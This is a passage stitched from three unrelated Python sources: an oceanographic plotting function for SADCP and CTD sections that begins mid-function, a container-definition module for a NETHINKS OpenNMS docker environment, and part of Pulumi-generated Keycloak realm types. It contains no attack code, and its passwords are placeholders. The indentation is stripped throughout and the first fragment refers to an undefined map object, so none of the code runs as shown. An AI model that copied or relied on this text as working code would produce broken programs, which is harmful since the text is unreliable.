from mpl_toolkits.basemap import Basemap
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
from matplotlib.patches import Polygon
axin = inset_axes(m.ax, width="30%", height="30%", loc=2)
# Global inset map.
inmap = Basemap(lon_0=np.mean(m.boundarylons),
lat_0=np.mean(m.boundarylats),
projection='ortho', ax=axin, anchor='NE')
inmap.drawcountries(color='white')
inmap.fillcontinents(color='gray')
bx, by = inmap(m.boundarylons, m.boundarylats)
xy = list(zip(bx, by))
mapboundary = Polygon(xy, edgecolor='k', linewidth=1, fill=False)
inmap.ax.add_patch(mapboundary)
return m
def OLD_plot_profile_view(scan_sadcp, ctd_ladcp, x_lim=[0,180],M2_flag=None):
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cbook
from oceans.sw_extras import gamma_GP_from_SP_pt
from matplotlib.patches import Polygon
import gsw
import pandas as pd
# ================
# Plot u,v,CT,RHO sections.
# if no CTD, plot M2, Rib
# ================
U_range = np.array((-0.4,0.4))
T_range = np.array((15,18)) #sst_range
Rho_range = np.array((1025.6,1026.6)) #((ctd_data.RHO.min(),ctd_data.RHO.max()))
sigma_range = np.array((25.6,26.)) #Rho_range-1000
N2_range = np.array((-5,-3)) #np.array((0.0001,0.1)) #Rho_range-1000
M2_range = np.array((-7,-6)) #np.array((0.0001,0.1)) #Rho_range-1000
Ri_range = np.array((0,1)) #Rho_range-1000
#x_lim = [0,180]
sigma_levels = np.arange(sigma_range[0]+.2,sigma_range[1]+.2,0.2)
# pick the desired colormap, sensible levels, and define a normalization
# instance which takes data values and translates those into levels.
from matplotlib.colors import BoundaryNorm
cmap = plt.cm.RdBu_r
levels = np.arange(-0.5,0.5,0.001)
norm = BoundaryNorm(levels, ncolors=cmap.N, clip=True)
shading_type = 'flat'
ncols, nrows = 8, 2
if M2_flag is not None: ncols, nrows = 8, 2
fig, ax = plt.subplots(nrows = nrows, ncols = ncols, sharey=True, figsize=(20,10))
for ri in range(len(scan_sadcp)):
# now add SADCP
ci_next = np.array((0,1)) + 2*ri
rik = 0
for ci in ci_next:
if ci == ci_next[0] and M2_flag is None: var_name, v_range, cmap_in = 'u' , U_range, plt.cm.RdBu_r#, 'flat'
if ci == ci_next[1] and M2_flag is None: var_name, v_range, cmap_in = 'v' , U_range, plt.cm.RdBu_r#, 'flat'
if ci == ci_next[0] and M2_flag is not None:
var_name, v_range, cmap_in = 'db_dx_log10', M2_range, plt.cm.Blues#, 'flat'
scan_sadcp[ri][var_name] = np.log10(scan_sadcp[ri]['db_dx'])
if ci == ci_next[1] and M2_flag is not None: var_name, v_range, cmap_in = 'Rib', Ri_range, plt.cm.Blues_r #, 'gouraud'
conmap = scan_sadcp[ri][var_name].reset_index('xy').plot.contourf(x='x_km',y='z',ax=ax[rik,ci],vmin=v_range[0],vmax=v_range[1],
cmap = cmap_in,
cbar_kwargs={'ticks': np.arange(v_range[0],v_range[1]+1,1),
'orientation':"horizontal",'pad': -0.2,
'label':''})
#conmap = ax[rik,ci].contourf(scan_sadcp[ri].distance/1000,scan_sadcp[ri].z,var2plot,
# vmin=v_range[0],vmax=v_range[1],cmap = cmap_in,shading=shading_type)
if ri > 0: # remove colorbar
conmap.colorbar.remove()
if ci == ci_next[0] and ctd_ladcp is None:
ax[rik,ci].set_title('u$_{SADCP}$ [ms$^{-1}$]')
if ci ==ci_next[1] and ctd_ladcp is None:
ax[rik,ci].set_title('v$_{SADCP}$ [ms$^{-1}$]')
if ci == ci_next[0] and ctd_ladcp is not None:
ax[rik,ci].set_title('M$^2_{SADCP}$ [s$^{-1}$]')
if ci ==ci_next[1] and ctd_ladcp is not None:
ax[rik,ci].set_title('Ri$^B_{SADCP}$ [-]')
if ci == ci_next[0] and rik ==0:
ax[rik,ci].set_ylabel('Depth [m]')
else:
ax[rik,ci].set_ylabel('')
ax[rik,ci].tick_params(labelleft=False)
if M2_flag is not None:
ax[rik,ci].set_xlabel('Distance [km]')
else:
ax[rik,ci].set_xlabel('')
ax[rik,ci].tick_params(labelbottom=False)
if ci == ci_next[0]:
dates = pd.Series(scan_sadcp[ri].time.values)
ax[rik,ci].text(0,0,(str(dates[0].month)+'-'+str(dates[0].day)+' '+str(dates[0].hour)+':'+str(dates[0].minute)),
transform=ax[rik,ci].transAxes,horizontalalignment='left',verticalalignment='bottom',fontsize=10)
ax[rik,ci].set_xlim(x_lim)
if scan_sadcp[ri].lat.values[0] > scan_sadcp[ri].lat.values[-1]:
ax[rik,ci].invert_xaxis()
dx,dy = 0,0 #np.mean(np.diff(scan_sadcp[ri].distance)), np.mean(np.diff(scan_sadcp[ri].z.values))
# contour needs matrices
X_grid, Y_grid = np.meshgrid(scan_sadcp[ri].distance +dx/2.,scan_sadcp[ri].z +dy/2.)
ax[rik,ci].contour(X_grid/1000, Y_grid, scan_sadcp[ri].sigma_0.T, levels = sigma_levels,colors='0.25',linewidths=0.5)
# now add Scanfish
if M2_flag is None:
rik = 1
for ci in ci_next:
if ci == ci_next[0]:
var_name2 | |
<reponame>NETHINKS/opennms-docker-env<gh_stars>1-10
""" Container module.
This module defines the container definitions for container_generator.
"""
import os
import time
import hashlib
from collections import OrderedDict
from OpenSSL import crypto
from template_engine import TemplateEngine
from docker import DockerImage
from docker import DockerServiceConfig
class Container(object):
"""Abstract definition of a container
This class represents an abstract definition of a container. It should not
be used directly. Instead a subclass which extends this class should be
used.
Attributes:
container_name: unique name of the container
output_basedir: base directory for output data
Usage:
A subclass of this should at first be initialized with __init__().
The method get_default_parameters() returns all parameters for a
container with default values. After that, the setup_container() method
creates all configuration and files needed for the specific container.
"""
default_parameters = OrderedDict()
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
self._container_name = container_name
self._container_parameters = OrderedDict()
self._container_proxylocations = []
self._container_outputdir = output_basedir + "/init/" + container_name
self._container_imagedir = output_basedir + "/images/"
self._container_imagename = self._container_name + ".tar"
self._container_namedvolumes = []
self._container_config = DockerServiceConfig(container_name)
self._app_config = app_config
# create output directories if not exist
os.makedirs(self._container_outputdir, exist_ok=True)
# init with default_parameters
self._container_parameters = type(self).default_parameters
def get_name(self):
"""Returns the container name"""
return self._container_name
def get_image_filename(self):
"""Returns the filename for the stored image"""
return "images/" + self._container_imagename
def setup_container(self, parameters):
"""Setup an container
This method must be implemented by a subclass. The following things
should be done in this method:
- setup proxy locations in self._container_proxylocations
- create container config in self._container_config
Args:
parameters: parameters for the container
"""
pass
def get_container_config(self):
"""Return the container config
Return:
The container config as DockerServiceConfig object
"""
return self._container_config
def get_proxy_locations(self):
"""Return all proxy locations that should be created for this one"""
return self._container_proxylocations
def get_named_volumes(self):
"""Return a list with all configured named volumes"""
return self._container_namedvolumes
def download_image(self):
# create image dir if not exist
os.makedirs(self._container_imagedir, exist_ok=True)
image_name = self._container_config.get_image()
output_filename = self._container_imagedir + self._container_imagename
docker_image = DockerImage(image_name)
docker_image.export_image(output_filename)
class OpenNMS(Container):
"""Class for defining a container for OpenNMS
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("database_server", "postgres"),
("database_user", "postgres"),
("database_password", "<PASSWORD>"),
("user_admin_password", "<PASSWORD>"),
("user_api_password", "<PASSWORD>"),
("cassandra_server", "cassandra"),
("cassandra_user", "cassandra"),
("cassandra_password", "<PASSWORD>")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["database_password"] = self._app_config.get_value("authentication", "db_password", "")
self._container_parameters["cassandra_password"] = self._app_config.get_value("authentication", "db_password", "")
self._container_parameters["user_admin_password"] = self._app_config.get_value("authentication", "admin_password", "")
self._container_parameters["user_api_password"] = self._app_config.get_value("authentication", "api_password", "")
def setup_container(self):
# setup proxy locations
self._container_proxylocations = [{
"name": "OpenNMS",
"location": "/opennms",
"url": "http://opennms:8980"
}]
# container config
self._container_config.set_image("nethinks/opennmsenv-opennms:18.0.4-2")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/opennms")
self._container_config.add_buildarg("build_customrepo", "https://opennmsdeploy.nethinks.com/repo/horizon/18.0.4/")
self._container_config.add_buildarg("url_sw_cassandra", "https://opennmsdeploy.nethinks.com/software/cassandra/apache-cassandra-3.0.14-bin.tar.gz")
self._container_config.set_privileged(True)
self._container_config.set_restart_policy("always")
self._container_config.add_environment("INIT_DB_SERVER",
self._container_parameters["database_server"])
self._container_config.add_environment("INIT_DB_USER",
self._container_parameters["database_user"])
self._container_config.add_environment("INIT_DB_PASSWORD",
self._container_parameters["database_password"])
self._container_config.add_environment("INIT_ADMIN_USER", "admin")
self._container_config.add_environment("INIT_ADMIN_PASSWORD",
self._container_parameters["user_admin_password"])
self._container_config.add_environment("INIT_API_USER", "api")
self._container_config.add_environment("INIT_API_PASSWORD",
self._container_parameters["user_api_password"])
self._container_namedvolumes.append("opennms")
self._container_namedvolumes.append("rrd")
self._container_config.add_volume("opennms:/data/container")
self._container_config.add_volume("rrd:/data/rrd")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/opennms:/data/init")
self._container_config.add_port("162/udp:162/udp")
self._container_config.add_port("514/udp:514/udp")
self._container_config.add_port("5817:5817")
self._container_config.add_dependency("postgres")
# check cassandra option and parameters
if self._app_config.get_value_boolean("container", "cassandra"):
self._container_config.add_environment("INIT_CASSANDRA_ENABLE", "true")
self._container_config.add_environment("INIT_CASSANDRA_SERVER",
self._container_parameters["cassandra_server"])
self._container_config.add_environment("INIT_CASSANDRA_USER",
self._container_parameters["cassandra_user"])
self._container_config.add_environment("INIT_CASSANDRA_PASSWORD",
self._container_parameters["cassandra_password"])
self._container_config.add_dependency("cassandra")
class PostgreSQL(Container):
"""Class for defining a container for PostgreSQL
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("database_user", "postgres"),
("database_password", "<PASSWORD>")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["database_password"] = self._app_config.get_value("authentication", "db_password", "")
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-postgres:9.5.3-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/postgres")
self._container_config.set_restart_policy("always")
self._container_config.add_environment("POSTGRES_USER",
self._container_parameters["database_user"])
self._container_config.add_environment("POSTGRES_PASSWORD",
self._container_parameters["database_password"])
self._container_namedvolumes.append("postgres")
self._container_config.add_volume("postgres:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/postgres:/data/init")
class Cassandra(Container):
"""Class for defining a container for Newts/Cassandra
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("cassandra_user", "cassandra"),
("cassandra_password", "<PASSWORD>")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["cassandra_password"] = self._app_config.get_value("authentication", "db_password", "<PASSWORD>")
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-cassandra:3.0.14-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/cassandra")
self._container_config.add_buildarg("url_sw_cassandra", "https://opennmsdeploy.nethinks.com/software/cassandra/apache-cassandra-3.0.14-bin.tar.gz")
self._container_config.add_buildarg("url_sw_jdk", "https://opennmsdeploy.nethinks.com/software/jdk/jdk-8u112-linux-x64.rpm")
self._container_config.set_restart_policy("always")
self._container_config.add_environment("CASSANDRA_USER",
self._container_parameters["cassandra_user"])
self._container_config.add_environment("CASSANDRA_PASSWORD",
self._container_parameters["cassandra_password"])
self._container_namedvolumes.append("cassandra")
self._container_config.add_volume("cassandra:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/cassandra:/data/init")
class Nginx(Container):
"""Class for defining a container for Nginx
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("ssl_organisation", "NETHINKS GmbH"),
("ssl_unit", "PSS"),
("ssl_country", "DE"),
("ssl_state", "HESSEN"),
("ssl_location", "Fulda"),
("ssl_cn", "localhost"),
("ssl_valid_time_days", "3650"),
("ssl_keylength", "4096"),
("ssl_digest", "sha384")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["ssl_organisation"] = self._app_config.get_value("ssl", "organisation", "")
self._container_parameters["ssl_unit"] = self._app_config.get_value("ssl", "unit", "")
self._container_parameters["ssl_country"] = self._app_config.get_value("ssl", "country", "")
self._container_parameters["ssl_state"] = self._app_config.get_value("ssl", "state", "")
self._container_parameters["ssl_location"] = self._app_config.get_value("ssl", "location", "")
self._container_parameters["ssl_cn"] = self._app_config.get_value("ssl", "cn", "")
self._container_parameters["ssl_valid_time_days"] = self._app_config.get_value("ssl", "valid_time_days", "")
self._container_parameters["ssl_keylength"] = self._app_config.get_value("ssl", "keylength", "")
self._container_parameters["ssl_digest"] = self._app_config.get_value("ssl", "digest", "")
self._container_parameters["support_text"] = self._app_config.get_value("supportinfo", "support_text", "")
self.__proxy_locations = []
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-nginx:1.10.2-2")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/nginx")
self._container_config.set_restart_policy("always")
self._container_config.add_port("80:80")
self._container_config.add_port("443:443")
self._container_namedvolumes.append("nginx")
self._container_config.add_volume("nginx:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/nginx:/data/init")
self._container_config.add_environment("INIT_SSL_CN",
self._container_parameters["ssl_cn"])
self._container_config.add_environment("INIT_SSL_ORG",
self._container_parameters["ssl_organisation"])
self._container_config.add_environment("INIT_SSL_UNIT",
self._container_parameters["ssl_unit"])
self._container_config.add_environment("INIT_SSL_COUNTRY",
self._container_parameters["ssl_country"])
self._container_config.add_environment("INIT_SSL_STATE",
self._container_parameters["ssl_state"])
self._container_config.add_environment("INIT_SSL_LOCATION",
self._container_parameters["ssl_location"])
self._container_config.add_environment("INIT_SSL_VALIDDAYS",
self._container_parameters["ssl_valid_time_days"])
self._container_config.add_environment("INIT_SSL_KEYLENGTH",
self._container_parameters["ssl_keylength"])
self._container_config.add_environment("INIT_SSL_DIGEST",
self._container_parameters["ssl_digest"])
self._container_config.add_environment("CONF_SUPPORTTEXT",
self._container_parameters["support_text"])
i = 10
for location in self.__proxy_locations:
location_varname = "CONF_LOCATION_" + str(i)
location_value = location["name"] + ";" + location["location"] + ";" + location["url"]
self._container_config.add_environment(location_varname, location_value)
i += 1
def set_proxy_locations(self, proxy_locations):
"""Method for adding proxy locations
This method must be executed before the setup_container() method
"""
self.__proxy_locations.extend(proxy_locations)
class Grafana(Container):
"""Class for defining a container for Grafana
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("admin_password", "<PASSWORD>"),
("opennms_url", "http://opennms:8980/opennms"),
("opennms_username", "admin"),
("opennms_password", "<PASSWORD>")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["admin_password"] = self._app_config.get_value("authentication", "admin_password", "")
self._container_parameters["opennms_username"] = "api"
self._container_parameters["opennms_password"] = self._app_config.get_value("authentication", "api_password", "")
def setup_container(self):
# setup proxy locations
self._container_proxylocations = [{
"name": "Grafana",
"location": "/grafana/",
"url": "http://grafana:3000/"
}]
# container config
self._container_config.set_image("nethinks/opennmsenv-grafana:3.1.1-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/grafana")
self._container_config.add_buildarg("url_sw_grafana", "https://opennmsdeploy.nethinks.com/software/grafana/grafana-3.1.1-1470047149.linux-x64.tar.gz")
self._container_config.set_restart_policy("always")
self._container_config.add_environment("ADMIN_PASSWORD",
self._container_parameters["admin_password"])
self._container_config.add_environment("ONMS_URL",
self._container_parameters["opennms_url"])
self._container_config.add_environment("ONMS_USER",
self._container_parameters["opennms_username"])
self._container_config.add_environment("ONMS_PASSWORD",
self._container_parameters["opennms_password"])
self._container_namedvolumes.append("grafana")
self._container_config.add_volume("grafana:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/grafana:/data/init")
class AlarmForwarder(Container):
"""Class for defining a container for Alarmforwarder
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("admin_password", "<PASSWORD>"),
("opennms_url", "http://opennms:8980/opennms/rest"),
("opennms_username", "admin"),
("opennms_password", "<PASSWORD>"),
("db_server", "postgres"),
("db_name", "alarmforwarder"),
("db_user", "postgres"),
("db_password", "<PASSWORD>")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["admin_password"] = self._app_config.get_value("authentication", "admin_password", "")
self._container_parameters["opennms_username"] = "api"
self._container_parameters["opennms_password"] = self._app_config.get_value("authentication", "api_password", "")
self._container_parameters["db_password"] = self._app_config.get_value("authentication", "db_password", "")
def setup_container(self):
# setup proxy locations
self._container_proxylocations = [{
"name": "AlarmForwarder",
"location": "/alarmforwarder/",
"url": "http://alarmforwarder:5000/"
}]
# container config
self._container_config.set_image("nethinks/opennmsenv-alarmforwarder:1.0.1-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/alarmforwarder")
self._container_config.set_restart_policy("always")
self._container_config.add_environment("ADMIN_PASSWORD",
self._container_parameters["admin_password"])
self._container_config.add_environment("DB_SERVER",
self._container_parameters["db_server"])
self._container_config.add_environment("DB_NAME",
self._container_parameters["db_name"])
self._container_config.add_environment("DB_USER",
self._container_parameters["db_user"])
self._container_config.add_environment("DB_PASSWORD",
self._container_parameters["db_password"])
self._container_config.add_environment("ONMS_URL",
self._container_parameters["opennms_url"])
self._container_config.add_environment("ONMS_USER",
self._container_parameters["opennms_username"])
self._container_config.add_environment("ONMS_PASSWORD",
self._container_parameters["opennms_password"])
self._container_namedvolumes.append("alarmforwarder")
self._container_config.add_volume("alarmforwarder:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/alarmforwarder:/data/init")
self._container_config.add_dependency("postgres")
class YourDashboard(Container):
"""Class for defining a container for yourDashboard
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("opennms_url", "http://opennms:8980/opennms/rest"),
("opennms_username", "admin"),
("opennms_password", "<PASSWORD>")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["opennms_username"] = "api"
self._container_parameters["opennms_password"] = self._app_config.get_value("authentication", "api_password", "")
def setup_container(self):
# setup proxy locations
self._container_proxylocations = [{
"name": "yourDashboard",
"location": "/yourdashboard",
"url": "http://yourdashboard"
}]
# container config
self._container_config.set_image("nethinks/opennmsenv-yourdashboard:0.3-2")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/yourdashboard")
self._container_config.set_restart_policy("always")
self._container_config.add_environment("INIT_OPENNMS_SERVER", "http://opennms:8980/opennms")
self._container_config.add_environment("INIT_OPENNMS_USER",
self._container_parameters["opennms_username"])
self._container_config.add_environment("INIT_OPENNMS_PASSWORD",
self._container_parameters["opennms_password"])
self._container_namedvolumes.append("yourdashboard")
self._container_config.add_volume("yourdashboard:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/yourdashboard:/data/init")
class Pris(Container):
"""Class for defining a container for PRIS
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-pris:1.1.5-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/pris")
self._container_config.add_buildarg("url_sw_pris", "https://opennmsdeploy.nethinks.com/software/pris/opennms-pris-dist-1.1.5-release-archive.tar.gz")
self._container_config.add_buildarg("url_sw_jdk", "https://opennmsdeploy.nethinks.com/software/jdk/jdk-8u112-linux-x64.rpm")
self._container_config.set_restart_policy("always")
self._container_namedvolumes.append("pris")
self._container_config.add_volume("pris:/data/container")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("./init/pris:/data/init")
class IPv6Helper(Container):
"""Class for defining a container for IPv6Helper
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("ip6net", "fd00:1::/48"),
("bridge_interface", "onmsenv0")
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["ip6net"] = self._app_config.get_value("network", "ipv6_internal_net", "")
self._container_parameters["bridge_interface"] = self._app_config.get_value("network", "bridge_interface_name", "")
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-ipv6helper:1.0.0-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/ipv6helper")
self._container_config.set_restart_policy("always")
self._container_config.set_privileged(True)
self._container_config.set_network_mode("host")
self._container_config.add_environment("CONF_IP6NET",
self._container_parameters["ip6net"])
self._container_config.add_environment("CONF_BRIDGE_INTERFACE",
self._container_parameters["bridge_interface"])
self._container_config.add_volume("/lib/modules:/lib/modules:ro")
class Management(Container):
"""Class for defining a container for management access
Please see documentation of class Container for more details
"""
default_parameters = OrderedDict([
("ssh_password", "<PASSWORD>"),
("backup_enabled", "False"),
("backup_url", "smb://username:password@1.2.3.4/backup/test"),
])
def __init__(self, container_name, output_basedir, app_config):
"""Initialization method"""
Container.__init__(self, container_name, output_basedir, app_config)
self._container_parameters["ssh_password"] = self._app_config.get_value("authentication", "admin_password", "")
self._container_parameters["backup_enabled"] = self._app_config.get_value("backup", "enabled", "False")
self._container_parameters["backup_url"] = self._app_config.get_value("backup", "url", "")
def setup_container(self):
# container config
self._container_config.set_image("nethinks/opennmsenv-management:1.1.0-1")
if self._app_config.get_value_boolean("setup", "build_images"):
self._container_config.set_build_path("../../../images/management")
self._container_config.add_buildarg("url_sw_docker", "https://opennmsdeploy.nethinks.com/software/docker/docker-17.03.1-ce.tgz")
self._container_config.set_restart_policy("always")
self._container_config.add_port("2222:22")
self._container_config.add_environment("CONF_SSH_PASSWORD",
self._container_parameters["ssh_password"])
self._container_namedvolumes.append("export")
self._container_namedvolumes.append("management")
self._container_config.add_volume("export:/data/export")
self._container_config.add_volume("management:/data/container")
self._container_config.add_volume("opennms:/data/all-containers/opennms")
self._container_config.add_volume("rrd:/data/all-containers/rrd")
self._container_config.add_volume("postgres:/data/all-containers/postgres")
self._container_config.add_volume("nginx:/data/all-containers/nginx")
if self._app_config.get_value_boolean("container", "cassandra"):
self._container_config.add_volume("cassandra:/data/all-containers/cassandra")
if self._app_config.get_value_boolean("container", "alarmforwarder"):
self._container_config.add_volume("alarmforwarder:/data/all-containers/alarmforwarder")
if self._app_config.get_value_boolean("container", "grafana"):
self._container_config.add_volume("grafana:/data/all-containers/grafana")
if self._app_config.get_value_boolean("container", "yourdashboard"):
self._container_config.add_volume("yourdashboard:/data/all-containers/yourdashboard")
if self._app_config.get_value_boolean("container", "pris"):
self._container_config.add_volume("pris:/data/all-containers/pris")
self._container_config.add_volume("./init/management:/data/init")
self._container_config.add_volume("/var/run/docker.sock:/var/run/docker.sock")
# create backup config, if required
if self._container_parameters["backup_enabled"] != "False":
self._container_config.add_environment("CONF_BACKUP_ENABLED", "TRUE")
self._container_config.add_environment("CONF_BACKUP_URL",
self._container_parameters["backup_url"])
| |
default Realm behavior.
"""
return pulumi.get(self, "realm_overrides")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class KeycloakRealmSpecInstanceSelector(dict):
"""
Selector for looking up Keycloak Custom Resources.
"""
def __init__(__self__, *,
match_expressions: Optional[Sequence['outputs.KeycloakRealmSpecInstanceSelectorMatchExpressions']] = None,
match_labels: Optional[Mapping[str, str]] = None):
"""
Selector for looking up Keycloak Custom Resources.
:param Sequence['KeycloakRealmSpecInstanceSelectorMatchExpressionsArgs'] match_expressions: matchExpressions is a list of label selector requirements. The requirements are ANDed.
:param Mapping[str, str] match_labels: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
if match_expressions is not None:
pulumi.set(__self__, "match_expressions", match_expressions)
if match_labels is not None:
pulumi.set(__self__, "match_labels", match_labels)
@property
@pulumi.getter(name="matchExpressions")
def match_expressions(self) -> Optional[Sequence['outputs.KeycloakRealmSpecInstanceSelectorMatchExpressions']]:
"""
matchExpressions is a list of label selector requirements. The requirements are ANDed.
"""
return pulumi.get(self, "match_expressions")
@property
@pulumi.getter(name="matchLabels")
def match_labels(self) -> Optional[Mapping[str, str]]:
"""
matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
return pulumi.get(self, "match_labels")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class KeycloakRealmSpecInstanceSelectorMatchExpressions(dict):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
"""
def __init__(__self__, *,
key: str,
operator: str,
values: Optional[Sequence[str]] = None):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
:param str key: key is the label key that the selector applies to.
:param str operator: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
:param Sequence[str] values: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "operator", operator)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def key(self) -> str:
"""
key is the label key that the selector applies to.
"""
return pulumi.get(self, "key")
@property
@pulumi.getter
def operator(self) -> str:
"""
operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
"""
return pulumi.get(self, "operator")
@property
@pulumi.getter
def values(self) -> Optional[Sequence[str]]:
"""
values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
return pulumi.get(self, "values")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class KeycloakRealmSpecRealm(dict):
"""
Keycloak Realm REST object.
"""
def __init__(__self__, *,
realm: str,
admin_events_details_enabled: Optional[bool] = None,
admin_events_enabled: Optional[bool] = None,
clients: Optional[Sequence['outputs.KeycloakRealmSpecRealmClients']] = None,
display_name: Optional[str] = None,
enabled: Optional[bool] = None,
events_enabled: Optional[bool] = None,
events_listeners: Optional[Sequence[str]] = None,
id: Optional[str] = None,
identity_providers: Optional[Sequence['outputs.KeycloakRealmSpecRealmIdentityProviders']] = None,
users: Optional[Sequence['outputs.KeycloakRealmSpecRealmUsers']] = None):
"""
Keycloak Realm REST object.
:param str realm: Realm name.
:param bool admin_events_details_enabled: Enable admin events details TODO: change to values and use kubebuilder default annotation once supported
:param bool admin_events_enabled: Enable events recording TODO: change to values and use kubebuilder default annotation once supported
:param Sequence['KeycloakRealmSpecRealmClientsArgs'] clients: A set of Keycloak Clients.
:param str display_name: Realm display name.
:param bool enabled: Realm enabled flag.
:param bool events_enabled: Enable events recording TODO: change to values and use kubebuilder default annotation once supported
:param Sequence[str] events_listeners: A set of Event Listeners.
:param Sequence['KeycloakRealmSpecRealmIdentityProvidersArgs'] identity_providers: A set of Identity Providers.
:param Sequence['KeycloakRealmSpecRealmUsersArgs'] users: A set of Keycloak Users.
"""
pulumi.set(__self__, "realm", realm)
if admin_events_details_enabled is not None:
pulumi.set(__self__, "admin_events_details_enabled", admin_events_details_enabled)
if admin_events_enabled is not None:
pulumi.set(__self__, "admin_events_enabled", admin_events_enabled)
if clients is not None:
pulumi.set(__self__, "clients", clients)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if events_enabled is not None:
pulumi.set(__self__, "events_enabled", events_enabled)
if events_listeners is not None:
pulumi.set(__self__, "events_listeners", events_listeners)
if id is not None:
pulumi.set(__self__, "id", id)
if identity_providers is not None:
pulumi.set(__self__, "identity_providers", identity_providers)
if users is not None:
pulumi.set(__self__, "users", users)
@property
@pulumi.getter
def realm(self) -> str:
"""
Realm name.
"""
return pulumi.get(self, "realm")
@property
@pulumi.getter(name="adminEventsDetailsEnabled")
def admin_events_details_enabled(self) -> Optional[bool]:
"""
Enable admin events details TODO: change to values and use kubebuilder default annotation once supported
"""
return pulumi.get(self, "admin_events_details_enabled")
@property
@pulumi.getter(name="adminEventsEnabled")
def admin_events_enabled(self) -> Optional[bool]:
"""
Enable events recording TODO: change to values and use kubebuilder default annotation once supported
"""
return pulumi.get(self, "admin_events_enabled")
@property
@pulumi.getter
def clients(self) -> Optional[Sequence['outputs.KeycloakRealmSpecRealmClients']]:
"""
A set of Keycloak Clients.
"""
return pulumi.get(self, "clients")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[str]:
"""
Realm display name.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def enabled(self) -> Optional[bool]:
"""
Realm enabled flag.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter(name="eventsEnabled")
def events_enabled(self) -> Optional[bool]:
"""
